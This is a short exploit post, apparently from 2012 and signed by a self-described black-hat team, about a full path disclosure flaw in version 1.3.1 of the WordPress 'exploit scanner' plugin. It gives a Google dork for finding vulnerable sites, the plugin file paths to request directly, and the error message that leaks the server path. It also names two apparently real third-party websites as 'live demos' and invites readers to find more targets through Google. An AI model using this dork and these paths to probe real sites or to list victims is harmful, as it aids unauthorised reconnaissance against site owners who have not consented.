Wordpress exploit scanner plugin Full Path Disclosure

# Exploit Title: wordpress exploit scanner plugin Full Path Disclosure

# Google Dork: inurl:"/plugins/exploit-scanner/"

# Date: 28/7/2012

# Author: Maher

# plugin download Link : http://downloads.wordpress.org/plugin/exploit-scanner.1.3.1.zip

# Version: 1.3.1

# Tested on: all

========================================

you can find full path of target by accessing directly to the file Or Error_log In The same diectory

/wp-content/plugins/exploit-scanner/exploit-scanner.php

/wp-content/plugins/exploit-scanner/error_log

http://127.0.0.1/wordpress/wp-content/plugins/exploit-scanner/exploit-scanner.php

Fatal error: Call to undefined function add_action() in /path-on-server/wp-content/plugins/exploit-scanner/exploit-scanner.php

on line 49

========================================

live demos:

http://fkstudio.free.fr/blog/wp-content/plugins/exploit-scanner/exploit-scanner.php

http://www.bienalpernambuco.com/wp-content/plugins/exploit-scanner/exploit-scanner.php

More Targets On Google :D

===============Maher Bro===========



Thanks to All : Voice OF Black Hat Hackers Team

pakistan Zindabad